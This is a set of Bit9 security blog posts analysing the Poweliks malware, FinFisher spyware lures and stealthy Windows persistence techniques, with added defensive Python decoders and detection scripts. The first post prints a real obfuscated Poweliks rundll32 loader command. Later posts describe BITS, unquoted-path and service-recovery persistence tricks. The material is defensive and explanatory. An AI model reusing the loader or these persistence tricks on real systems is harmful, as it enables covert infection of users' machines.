Following Poweliks Strike, Custom Bit9 Rule Offers Key Insight and Blocks Infection

I wrote this blog post for the Bit9 Blog; it was published on January 21, 2015.


I love to hear stories about how our customers use our products. I previously wrote about a global services firm that used Bit9 to connect the dots to get to the bottom of an Internet Explorer exploit. This same company sent me the following story to show a particularly useful rule they created in Bit9:

“We wound up getting hit by a Poweliks variant pretty badly shortly after I originally emailed you, where 44 users who were in full lockdown mode had to have their computers reimaged (At that time the majority of anti-malware tools didn’t detect that malware, let alone clean it). Fortunately, we identified what was happening fairly quickly thanks to the Bit9 agent, and we were able to put a custom rule in place in Bit9 to identify users who were infected or were in the initial stage of infection. Without Bit9 installed we wouldn’t have even been able to identify who was infected, let alone prevent the payload from executing.”

Somewhere along the way, the computers that had to be reimaged acquired the following registry entry (a command line; the long argument to eval() is obfuscated by shifting every character up by one, which the trailing replace() undoes at run time):

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) -Embedding
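The payload carries its own decoder (String.fromCharCode(_.charCodeAt()-1) on every character), so the eval() argument can be recovered offline without running anything. The script below is an added example, not code from the post or from Bit9: it pulls the shifted string and the shift amount out of the command line, undoes the shift, and extracts the registry path the decoded JScript reads back. The command line is a copy of the one quoted above with straight quotes; the function names are mine. Decoding shows the stage that ran here is just a loader: it reads a second script out of value "a" under HKCU\software\classes\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32, which is why nothing beyond this one registry value needs to exist on disk.

```python
"""Decoder for the Caesar-shifted JScript in the Poweliks rundll32 command line.
Added example; POWELIKS_CMD is a copy of the registry value quoted in the post."""
import re

POWELIKS_CMD = (
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
    'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*"'
    '.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) -Embedding'
)

# The payload's own decoder: fromCharCode(charCodeAt()-1) on every character is a
# Caesar shift over the whole ASCII range. %20 is the URL-encoded space of the
# javascript: URL form; capture the shift amount rather than assuming -1.
SHIFT_RE = re.compile(
    r'eval\("([^"]*)"\.replace\(/\./g,\s*function\(_\)\{return(?:%20|\s)'
    r'String\.fromCharCode\(_\.charCodeAt\(\)([+-]\d+)\);\}\)\)'
)


def shift_chars(text, delta):
    """Apply the same per-character shift the payload applies to itself."""
    return "".join(chr(ord(c) + delta) for c in text)


def decode_poweliks_command(cmdline):
    """Recover the JScript that eval() runs and the registry path it reads."""
    m = SHIFT_RE.search(cmdline)
    if not m:
        raise ValueError("no fromCharCode-shift eval() in command line")
    decoded = shift_chars(m.group(1), int(m.group(2)))
    # The decoded script calls WScript.Shell.RegRead('...'); unescape the JS
    # string literal (\\ -> \) to get the path as the registry sees it.
    reg = re.search(r"RegRead\('([^']*)'\)", decoded)
    path = reg.group(1).replace("\\\\", "\\") if reg else None
    clsid = re.search(r"\{[0-9a-f-]{36}\}", path or "", re.I)
    return {"decoded": decoded, "regread_path": path,
            "clsid": clsid.group(0) if clsid else None}


def looks_like_rundll32_javascript(cmdline):
    """Detection for the technique itself, independent of how the payload is
    obfuscated: rundll32 handed a javascript: URL that reaches RunHTMLApplication."""
    c = cmdline.lower()
    return "rundll32" in c and "javascript:" in c and "runhtmlapplication" in c


if __name__ == "__main__":
    info = decode_poweliks_command(POWELIKS_CMD)
    print(info["decoded"])
    print("reads registry value:", info["regread_path"])
```

The shift regex deliberately captures the shift amount and tolerates a literal space or %20, because variants change both; the heuristic in looks_like_rundll32_javascript fires on the rundll32/mshtml trick regardless of what the script says.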

Once the above code executed, it would:

  1. Spawn an instance of PowerShell
  2. Spawn a dllhost (or many dllhosts)
  3. Connect to up to five different Russian IP addresses
  4. Initiate the usual malware behavior

Pretty clever!

I wouldn't have guessed that rundll32 would be able to execute JavaScript code, but it can: rundll32 loads whatever comes before the comma as a DLL, and the path trick javascript:"\..\mshtml resolves to mshtml.dll; the export named after the comma, RunHTMLApplication, then reads the process command line and runs the javascript: URL it finds there. If you are curious to see for yourself, try executing the following:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('RaawwwrrrrRRrrr');


Fortunately, rundll32.exe doesn’t usually launch PowerShell, so we were able to quickly identify infected users by using the following Bit9 rule:


The rule then blocked PowerShell whenever rundll32.exe tried to launch it, which kept the computer from becoming completely infected. We then ran a report on the files blocked by that rule to identify the infected users.
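The rule itself appears in the post only as a screenshot, but the logic it describes is a parent/child check: block PowerShell when its parent is rundll32.exe, then report on who got blocked. The script below is an added example of that logic applied to process-creation events; it is illustrative Python, not the Bit9 rule, and the event fields, sample events and the "report-only" set for dllhost are my own constructions.

```python
"""Added example: the rundll32 -> powershell parent/child rule from the post,
run over constructed process-creation events."""
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


# Constructed sample events modelled on the chain in the post: rundll32 with a
# javascript: URL spawns PowerShell and dllhost on one host; an admin script on
# another host runs PowerShell from Explorer and must not be caught.
SAMPLE_EVENTS = [
    ProcEvent("WS-041", "corp\\alice", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\rundll32.exe",
              'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";alert(1)'),
    ProcEvent("WS-041", "corp\\alice", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -w hidden -enc SQBFAFgA"),
    ProcEvent("WS-041", "corp\\alice", r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\dllhost.exe", "dllhost.exe"),
    ProcEvent("WS-102", "corp\\bob", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),
]

BLOCK_PARENT = "rundll32.exe"
BLOCK_CHILDREN = {"powershell.exe"}            # what the post's rule blocks
REPORT_CHILDREN = {"dllhost.exe", "cmd.exe"}   # assumption: too noisy to block, report only


def _name(path):
    return PureWindowsPath(path).name.lower()


def evaluate(event):
    """Return ('block', reason), ('report', reason) or None. 'block' is what a
    Block-mode rule does; in Monitor-only mode the same match would only alert."""
    parent, child = _name(event.parent_image), _name(event.image)
    if parent == BLOCK_PARENT and child in BLOCK_CHILDREN:
        return "block", f"{child} launched by {parent}"
    if parent == BLOCK_PARENT and child in REPORT_CHILDREN:
        return "report", f"{child} launched by {parent}"
    if child == BLOCK_PARENT and "javascript:" in event.cmdline.lower():
        return "report", "rundll32 handed a javascript: URL"
    return None


def infected_users(events):
    """The follow-up report from the post: (host, user) pairs that hit a block."""
    hits = set()
    for e in events:
        verdict = evaluate(e)
        if verdict and verdict[0] == "block":
            hits.add((e.host, e.user))
    return sorted(hits)


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e.host, _name(e.image), evaluate(e))
    print("reimage list:", infected_users(SAMPLE_EVENTS))
```

Matching on the parent image rather than the PowerShell command line is what makes this rule cheap and hard to evade: the attacker controls the script, not who launches it.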

In the end, the exercise provided the fuel that I needed to convince management to approve an installation of a Carbon Black server for even greater visibility.



Scan-based Forensics Solutions Are for Cavemen

I wrote this blog post for the Bit9 Blog; it was published on January 15, 2015.


I had the opportunity to work with a global services firm that had some problems with malware on machines that were running Bit9. They were running Bit9 in “High Enforcement” mode, so the infection was being blocked, but they wanted to get to the source of the attack, since it was creating some noise in their SIEM.

At that point the customer only had a few clues. They knew something was creating a task in c:\windows\system32\tasks that was named with a GUID (e.g., {462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}).

That task would then attempt to run regsvr32.exe to register a DLL in c:\windows\system32. The DLLs they encountered were named with five to six alphabetic characters. In one example, ssaxxo.dll was dropped into the c:\windows\system32 directory.

The files had unique hashes, but they were all detected as known malware. Whenever a DLL was dropped into c:\windows\system32, another file with a different name appeared in c:\windows\syswow64 as well. Both DLLs appeared to have been written by rundll32.exe.

It was confirmed that their antivirus of choice did not detect this threat, while Bit9 did.

However, without more context, all they knew was that they had a vulnerability somewhere. The question was: “Where?”

At this point, the customer sent us the logs to review and collaboratively find the source of the exploit. Our Bit9 Threat Research Team jumped in, and it didn’t take long to assess the issue.

Internet Explorer was being exploited.

An IE exploit was used to drop the first DLL, create the scheduled task, and then pass the DLL to rundll32.exe. rundll32 then created the file they discovered, and the scheduled task attempts to register it via regsvr32.exe, which Bit9 blocks. The scheduled task is set to keep trying every 10 minutes.
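The three artifacts the customer had (a task named with a bare GUID, regsvr32 registering a five-to-six-letter DLL in a system directory, and a 10-minute retry) are all visible in the task definition itself, which is an XML file under c:\windows\system32\tasks. The script below is an added example, not something from the post or from Bit9, that parses such a file and reports which of those indicators it matches. The two task definitions are constructed for the example; nothing here was recovered from the incident.

```python
"""Added example: parse a Task Scheduler definition and flag the GUID-name /
regsvr32-random-DLL / short-repeat pattern described in the post."""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"
NS = {"t": TASK_NS}

# On disk these files are UTF-16 with an XML declaration; open them with
# encoding="utf-16" and pass the resulting str to parse_task(). Constructed:
SAMPLE_TASK_NAME = "{462BD9BA-4D27-EA09-F2AC-704C4DDA8D16}"
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2015-01-05T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>regsvr32.exe</Command>
      <Arguments>/s C:\\Windows\\system32\\ssaxxo.dll</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2015-01-05T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Program Files\\Vendor\\updater.exe</Command><Arguments>/quiet</Arguments>
  </Exec></Actions>
</Task>"""

GUID_NAME = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.I)
RANDOM_DLL = re.compile(r"^[a-z]{5,6}\.dll$", re.I)   # the naming the customer saw
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def parse_task(xml_text):
    """Pull the Exec action and any repetition interval out of a task definition."""
    root = ET.fromstring(xml_text)
    return {
        "command": root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS).strip(),
        "arguments": root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS).strip(),
        "interval": root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS).strip(),
    }


def interval_minutes(iso_duration):
    """PT10M -> 10. Assumption: only the hour/minute forms are handled here."""
    m = re.fullmatch(r"PT(?:(\d+)H)?(?:(\d+)M)?", iso_duration)
    if not m or not any(m.groups()):
        return None
    hours, minutes = m.groups()
    return int(hours or 0) * 60 + int(minutes or 0)


def assess_task(task_name, xml_text):
    """Return the indicators from the post that this task definition matches."""
    task = parse_task(xml_text)
    findings = []
    if GUID_NAME.match(task_name):
        findings.append("task name is a bare GUID")
    if PureWindowsPath(task["command"]).name.lower() == "regsvr32.exe" and task["arguments"]:
        target = PureWindowsPath(task["arguments"].split()[-1].strip('"'))
        if RANDOM_DLL.match(target.name) and str(target.parent).lower() in SYSTEM_DIRS:
            findings.append(f"regsvr32 registers random-named DLL {target.name} in {target.parent}")
    minutes = interval_minutes(task["interval"])
    if minutes is not None and minutes <= 15:
        findings.append(f"repeats every {minutes} minutes")
    return findings


if __name__ == "__main__":
    print(SAMPLE_TASK_NAME, assess_task(SAMPLE_TASK_NAME, SAMPLE_TASK_XML))
    print("VendorUpdate", assess_task("VendorUpdate", BENIGN_TASK_XML))
```

Each indicator on its own is weak (legitimate software does name tasks with GUIDs), so the value is in reporting all three together; a task that matches all of them is worth pulling the DLL for.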

As we were going through this exercise, the customer wished they were also running Carbon Black.

That's because they knew from a recent demo that Carbon Black can do this type of analysis in seconds. There is no need to review log files to connect the dots; Carbon Black assembles that data for you, and it is available with just a few clicks. Plus, with Carbon Black, the customer would have known which IP address was exploiting them.

This ability to connect the dots is because the Bit9 Security Platform and Carbon Black operate in real time at the kernel layer. Products that merely perform file scans cannot deliver this level of visibility.

I think back on my days doing forensics on disk images and it seems like caveman days. It still surprises me that organizations are still buying scan-based forensic software in what is very much a real-time threat landscape.

Cyberespionage Tackle Box: FinFisher Spyware Casts Wide Net

FinFisher's Global Proliferation: Updated Map (copyright The Citizen Lab, 2013)

EDIT: New information about FinFisher was released by F-Secure on August 30, 2013.

Originally posted on the Bit9 Corporate Blog.

As I reviewed recent headlines, I took note of a company out of the U.K., Gamma International, that makes purpose-built spying tools. Its software offering is called FinFisher (aka FinSpy). The buzz phrase they use is "lawful intercept," which means that its use should be bound by laws that allow spying in certain circumstances. Personally, I file it under "greyware," considering it could be used legally or illegally to remotely control a machine or embed cyberespionage tools within benign-looking software. So how do organizations secure themselves against these kinds of tools?

Last year Morgan Marquis-Boire, a security researcher at the Citizen Lab at the University of Toronto's Munk School of Global Affairs, and Bill Marczak, a computer science doctoral student at the University of California, Berkeley, found emails containing surveillance tools traced back to Gamma International. More recently, those researchers found FinFisher command-and-control servers running in 36 countries. According to Mikko Hypponen of F-Secure, Gamma International even tried to sell FinFisher to the Egyptian government under former President Mubarak.

As the New York Times reported in March:

Martin J. Muench, a Gamma Group managing director, has said his company does not disclose its customers but that Gamma Group sold its technology to governments only to monitor criminals. He said that it was most frequently used “against pedophiles, terrorists, organized crime, kidnapping and human trafficking.”

But evidence suggests the software is being sold to governments where the potential for abuse is high. “If you look at the list of countries that Gamma is selling to, many do not have a robust rule of law,” Mr. Marquis-Boire said. “Rather than catching kidnappers and drug dealers, it looks more likely that it is being used for politically motivated surveillance.”

FinSpy vs. Mozilla Firefox.

The Citizen Lab released research on the topic a few days ago titled “For Their Eyes Only: The Commercialization of Digital Spying.” The data in this report is shocking in many ways, including a mobile version of FinSpy that follows the same path as its desktop equivalent.

They also have a sample package that realistically masquerades as Mozilla’s Firefox. They copied so many details that Mozilla sent Gamma International a cease-and-desist letter, according to Wired. As you see in the screenshot below, the properties of the executable are identical. How would one ever know the difference? You could rely on virus scanners, but without a sample of the malicious code they won’t be able to detect or stop it.

The tried-and-true security tools that most of us depend on are reactive. You have to wait on security researchers to tear apart samples that they find in the wild to give you reactive protection. It’s the same old cat-and-mouse game that leaves you open to attack.

Fortunately, there is a way to end the game. The Bit9 Trust-based Security Platform takes a different approach by blocking the execution of untrusted files across endpoints and servers. Let’s look through the Citizen Lab’s research paper and see how Bit9 would stop these threats.

  • In the messages sent to Bahraini dissidents, the attackers used the "right-to-left override" trick. From the research paper: "The RLO character (U+202e in unicode) controls the positioning of characters in text containing characters flowing from right to left, such as Arabic or Hebrew. The malware appears on a victim's desktop as 'exe.Rajab1.jpg' (for example), along with the default Windows icon for a picture file without thumbnail. But, when the UTF-8 based filename is displayed in ANSI, the name is displayed as 'gpj.1bajaR.exe.' Believing that they are opening a harmless '.jpg,' victims are instead tricked into running an executable '.exe' file."
    • If Bit9 were installed and running in high-enforcement mode, the unknown or untrusted executable would not have executed. Even if you were running Bit9 in block-and-ask mode, the user would be alerted that a program was trying to run something other than a .jpg.
  • In emails sent to the Moroccan citizen media and journalism project Mamfakinch, the payload was in a malicious Java file, "adobe.jar." This file then facilitated the installation of a multi-platform (OS X and Windows) backdoor. On Windows, it writes a number of files, including ZsROY7X.-MP, which appears to provide the main backdoor functionality. It adds a registry key to ensure the Trojan stays persistent and runs via rundll32.
    • Bit9 can track and block Java files as it does other executables, but that option isn't turned on by default. With Java tracking enabled, Bit9 would keep "adobe.jar" from ever executing. Say you don't have Java tracking enabled. In that case, "adobe.jar" would execute and write its files to the endpoint. Bit9 examines each file's contents rather than its name, recognizing "ZsROY7X.-MP" as a DLL despite its extension, and when rundll32.exe is called to load it, that execution is blocked. The Trojan never runs with Bit9 installed.
  • In an email sent to Ahmed Mansoor, a prominent UAE blogger who was imprisoned, the payload is a malicious document that looks like a Microsoft Word file but is an RTF file that exploits a stack-based buffer overflow in Word's RTF parser and downloads additional payloads. Using a Windows API call, the exploit downloads a second file, which is itself a downloader. The third stage is where the backdoor is downloaded, "verimportant.doc3." That file then writes out several files, including "V46lMhsH.shv," which is run via rundll32.exe.
    • This use case has a different point of injection, but the same outcome. In this case, either the second downloader or the backdoor itself would be blocked by Bit9. Since the backdoor wouldn’t execute, cleanup would be relatively easy since it wasn’t able to inject itself into other software.
  • In the use case of the modified version of Firefox, the user would be tricked into installing the wrong version by DNS poisoning, link-jacking, cross-site scripting, clever emails, or other means. The user would then install what looks to be a normally functioning version of Firefox. Infecting an endpoint in this manner tricks the user into accepting changes to his or her system. They know they are installing software, so they are more likely to click "yes" to any security warnings.
    • Companies using Bit9 build a trust-based security approach that ensures any software delivered and executed on an endpoint has been approved in some trusted fashion. Whatever model is deployed, it can prevent “trick the end user” attacks because the malicious version of Firefox is not signed by Mozilla. It would not be able to pass the rigors of a trust-based approach and would not be allowed to execute on the endpoint.
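Two of the lures above work because the file name lies about the content: the RLO character makes "gpj.1bajaR.exe" render as "exe.Rajab1.jpg", and "ZsROY7X.-MP" is a DLL with an extension that says otherwise. The script below is an added example, not code from the post or from Bit9 or Citizen Lab, of checking both things the way a content-aware control would: what the name displays versus the extension the shell actually uses, and what the bytes are regardless of the name. The PE bytes are a constructed minimal header, not the FinSpy sample, and the function names are mine.

```python
"""Added example: expose RLO file-name deception and decide exe/dll from PE
headers rather than the extension."""
import struct

# Unicode bidi controls an attacker can plant in a file name (U+202A-U+202E, U+2066-U+2069).
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
RLO = "\u202e"
EXECUTABLE_EXTS = {"exe", "dll", "sys", "scr", "cpl", "ocx", "drv"}


def has_bidi_override(name):
    return any(c in BIDI_CONTROLS for c in name)


def apparent_name(name):
    """What a renderer shows: everything after an RLO is drawn right to left, so
    the reader sees it reversed. (Simplification of the bidi algorithm that is
    accurate for Latin-only file names.)"""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    return head + tail[::-1]


def true_extension(name):
    """The extension the shell actually uses, with bidi controls stripped."""
    plain = "".join(c for c in name if c not in BIDI_CONTROLS)
    return plain.rsplit(".", 1)[-1].lower() if "." in plain else ""


IMAGE_FILE_DLL = 0x2000


def pe_kind(data):
    """'dll', 'exe' or None, decided from the headers and never the file name."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return "dll" if characteristics & IMAGE_FILE_DLL else "exe"


def minimal_pe(is_dll):
    """Constructed 88-byte PE stub: DOS header with e_lfanew=0x40, then the COFF header."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    chars = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)   # EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0, chars)
    return dos + coff


def triage(name, data=b""):
    """Findings for one file: name-level deception and content/extension mismatch."""
    findings = []
    ext = true_extension(name)
    if has_bidi_override(name):
        findings.append(f"bidi override: shown as {apparent_name(name)!r}, real extension .{ext}")
    kind = pe_kind(data)
    if kind and ext not in EXECUTABLE_EXTS:
        findings.append(f"{kind} image with non-executable extension .{ext}")
    return findings


if __name__ == "__main__":
    for name, data in [("\u202egpj.1bajaR.exe", minimal_pe(False)),
                       ("ZsROY7X.-MP", minimal_pe(True)),
                       ("Rajab1.jpg", b"\xff\xd8\xff\xe0")]:
        print(repr(name), triage(name, data))
```

The point of pe_kind is that it never consults the name: a loader decides what to do with a file from its headers, so a control that wants to stop rundll32 from loading "ZsROY7X.-MP" has to classify the same way.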

Malware comes in various shapes and sizes, with some written by criminals and others written by private companies. Keeping up with these advanced threats requires a new approach to security. Bit9 ensures that only trusted software can run, as opposed to relying on deep analysis of already-known threats that takes time and money while still leaving you insecure. A trust-based approach is the most secure method to ensure your endpoints and servers are not being spied on by foreign governments using products such as FinFisher and FinSpy.

Bit9 2013 Server Security Survey

Bit9 2013 Server Security Survey Shows Concerns about Targeted Malware Rising

1,000 IT and Security Pros Worldwide are Less Confident about Stopping Threats

WALTHAM, Mass.—March 21, 2013—Bit9, the leader in Trust-based Security, today announced the results of its second annual server security survey of nearly 1,000 IT and security professionals worldwide. Key findings include:

  1. 52 percent of respondents said targeted malware attacks are their top server security concern, up 15 percent from the prior year.
  2. 25 percent of respondents said their servers were attacked in 2012, up 8 percent.
  3. 12 percent of the survey group ranked the "too much administrative effort" required by traditional security solutions as a bigger concern than actual attacks. 43 percent of respondents use more than one full-time employee to manage server security.

Click here to download the Bit9 2013 Server Security Survey report and the infographic The Truth about Server Security.

“These results highlight the need for greater control in identifying and stopping advanced attacks on valuable server resources—before they execute—while decreasing the security-related administrative workloads of IT and security professionals,” said Brian Hazzard, vice president of product management for Bit9. “The key to securing enterprise servers—both physical and virtual—is to allow only trusted software to execute and prevent all other files from running. That’s how the Bit9 Platform protects our customers’ servers and endpoints against targeted attacks, zero-day threats and all other types of malware.”

Wipe the Drive! or use Bit9

I just read a great pair of articles by Mark Baggett (@MarkBaggett) on the ISC Diary: Wipe the drive! Stealthy Malware Persistence Mechanism – Part 1 and Wipe the drive! Stealthy Malware Persistence – Part 2. They come from his presentation at ShmooCon 2013. He shows four different ways malware can stick around even after it has been "cleaned" by anti-malware products. I completely agree with his advice: always "wipe the drive." It's the only sure-fire way to clean the system, but what if you can't for some reason? Maybe it's a traveling employee or an executive at a conference. Wiping and re-imaging is a costly procedure in most enterprises.

What if you had Bit9 installed? How would these four situations play out? Let's go through them. Bit9 can run in three protection modes: Monitor-only with Advanced Threat Indicators (ATIs), Block & Ask, and Block. If you are running endpoints in Monitor-only mode with ATIs, you would get an alert on your Bit9 console for these actions. That alert could be acted upon within Bit9 or from your SIEM. For the other two modes, I'll explain how each of these would be blocked, since that's how most of our customers use Bit9.

TECHNIQUE #1 – File Association Hijacking

What happens when you click on a .TXT file? The operating system checks the HKEY_CLASSES_ROOT hive for the associated extension to see what program it should launch. …

What if the attacker or his malware changes this association? Instead of launching notepad it tells the OS to launch NOTPAD.EXE. NOTPAD.EXE is a wrapper around the real NOTEPAD.EXE, but it also contains a malicious payload.

This is pretty straightforward. NOTPAD.EXE would be blocked because it isn't trusted. No matter how the user was tricked into running it, Bit9 is protecting you. When you get the block alert, it's time to wipe the drive, but only when you get around to it… after all, you are protected by Bit9.


TECHNIQUE #2 – BITS

BITS is the Background Intelligent Transfer System. This service is used by your operating system to download patches from Microsoft or your local WSUS server. But this service can also be used to schedule the download of an attacker's malware to reinfect your system. Once the attacker or his malware is on your machine, he executes BITSADMIN to schedule the download of … He schedules the job to only retry the URL once a day and automatically execute the program after it is successfully downloaded. The attacker doesn't put anything at that URL today. Instead, he simply waits for you to finish your incident handling process and look the other way. You can scan the machine with 100 different virus scanners. Today there is no file on your system to detect. You can do memory forensics all day. Sorry, there is nothing running today. Today it is just a simple configuration change to the OS. Then when he is ready he places malware.exe on his site. Your machine dutifully downloads the new malware and executes it.

Again, this is a very easy use case. malware.exe wouldn't be allowed to run. When you get the block alert, it's time to wipe the drive, but only when you get around to it. Bit9's got you covered until then.

TECHNIQUE #3 – Program.exe

When Jake and I were preparing for the ShmooCon talk that we gave on this subject, I suggested we include this technique in our presentation. Jake disagreed because this thing has been around since the year 2000, and I quickly relented and agreed with him. At the time we both thought that this technique is pretty lame and we shouldn't have to worry about a THIRTEEN-YEAR-OLD vulnerability. Instead I decided to do a post on the ISC to talk about the technique and see what response we got. The response from you, our awesome supporters, was incredible. ISC readers documented several dozen of these attacks in critical systems common to most corporate desktop images. You made Jake a believer (he had a vulnerable OEM application you found on his laptop). The response was such that I am now convinced that an attacker can use this technique and have a great deal of confidence that his malware will be launched. As a matter of fact, it will probably be launched by something that has system permissions. I won't repeat the full details of the technique here since I already covered it on the ISC. You can check out this article if you missed it:

This is the scenario. Malware or an attacker is on your machine. He has administrative or Power User access. The attacker drops a file called "program.exe" on the root of your C drive. "program.exe" is a small application that reads the command line parameters that were used to call it. It launches the real program you had intended to call and then executes its malicious payload. Simple but effective.
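What makes C:\program.exe get launched at all is the documented way CreateProcess handles an unquoted command line whose path contains spaces: it tries each space-delimited prefix, with .exe appended, before the intended binary, so C:\Program Files\Vendor Name\app.exe is preceded by C:\Program.exe and C:\Program Files\Vendor.exe. The script below is an added example of that rule, not Mark Baggett's code or Bit9's: it lists the files an attacker could drop for a given unquoted path and applies the check to constructed service ImagePath values, which are the usual place such paths live and the reason the payload tends to run as SYSTEM. The function names and sample values are mine.

```python
"""Added example: the executables CreateProcess tries for an unquoted path with
spaces, and a check over constructed service ImagePath values."""


def tried_before_target(unquoted_path):
    """Executables Windows would try, in order, before reaching the real one.
    .exe is appended only when the prefix's last path component has no
    extension, following the documented lpCommandLine rule."""
    tokens = unquoted_path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):          # every proper prefix
        prefix = " ".join(tokens[:i])
        last_component = prefix.rsplit("\\", 1)[-1]
        candidates.append(prefix if "." in last_component else prefix + ".exe")
    return candidates


def executable_part(image_path):
    """Cut an unquoted ImagePath after its first '.exe' (assumption: the service
    binary is an .exe and any arguments follow it)."""
    i = image_path.lower().find(".exe")
    return image_path if i < 0 else image_path[: i + 4]


def unquoted_path_risks(image_paths):
    """Map service name -> files an attacker could drop to hijack its start-up.
    Quoted paths and NT-style driver paths (starting with a backslash) are skipped."""
    risks = {}
    for service, image_path in image_paths.items():
        image_path = image_path.strip()
        if image_path.startswith('"') or image_path.startswith("\\"):
            continue
        exe = executable_part(image_path)
        if " " in exe:
            risks[service] = tried_before_target(exe)
    return risks


# Constructed values of the kind found under HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath.
SAMPLE_IMAGE_PATHS = {
    "VendorAgent": r"C:\Program Files\Vendor Name\agent.exe -service",
    "OtherAgent": r'"C:\Program Files\Other Vendor\agent.exe" -service',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "VendorDrv": r"\SystemRoot\System32\drivers\vendor.sys",
}

if __name__ == "__main__":
    for service, drops in unquoted_path_risks(SAMPLE_IMAGE_PATHS).items():
        print(f"{service}: anyone who can write {drops} runs when the service starts")
```

Running this over a gold image's service list is a cheap way to find the "C:\Program.exe" exposure before the image is approved; the fix for each finding is simply quoting the ImagePath.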

This one is interesting. When you install the Bit9 agent, it locally approves all files on the system. Then you set up a chain of trust. If program.exe is already on old machines or in existing gold images, Bit9 will trust it as part of that approved baseline.

I would advise following the link above and understanding this issue. It's worth reviewing gold images a bit more closely when putting them into your trust-based architecture in Bit9. That review is a great use case for cloud-based reputation via Bit9's Software Reputation Service (SRS). If you have any questionable files on your image, run them through SRS and find out what the world thinks about them. Another bit of advice for vetting gold images: review unsigned code! You can even detonate files in a FireEye MAS, if you have one.

If you do find any malware like this program.exe, globally ban it in Bit9 (and delete it from your gold image)!  This will instantly protect all existing computers running the Bit9 agent.  Global Bans even work on Bit9 agents running in Monitor-only mode.  No need to wipe every drive immediately when you are protected with Bit9.

TECHNIQUE #4 – Service Failure Recovery Startups

You can configure Windows services with an automatic recovery action. The defined action will be taken when the service crashes unexpectedly. You can see these on the Recovery tab for a service using services.msc. Here you see this service first tries to restart the service, then it will…. ummm… what's that?? .. RUN A PROGRAM. Hmm.

This use case is also straightforward. The malware has tricked the user, even tricked the system, but it hasn't tricked Bit9. Blocked, again.

I hope this helps shine a light on the power of software whitelisting. It changes the game in endpoint protection. You don't have to go running after every trick in the book that may fool a user. You only have to vet the software you trust, and you don't have to wipe the drive immediately when an infection occurs. Bit9 gives you the freedom to keep the endpoint protected while you wipe the drive at your convenience.

Learn about the new Bit9 Advanced Threat Detection


Hear Michael Bilancieri tell the compelling story of our new detection and forensics capabilities and innovative new Advanced Threat Indicators.

Bit9’s Trust-based Security Platform combines real-time sensors, Advanced Threat Indicators (ATI), and the cloud-based Bit9 Software Reputation Service to immediately detect advanced threats and malware. You won’t wait for signature file updates. No testing or updating .dat files. Bit9 specializes in advanced threat detection.

Moving On and adding some Bits

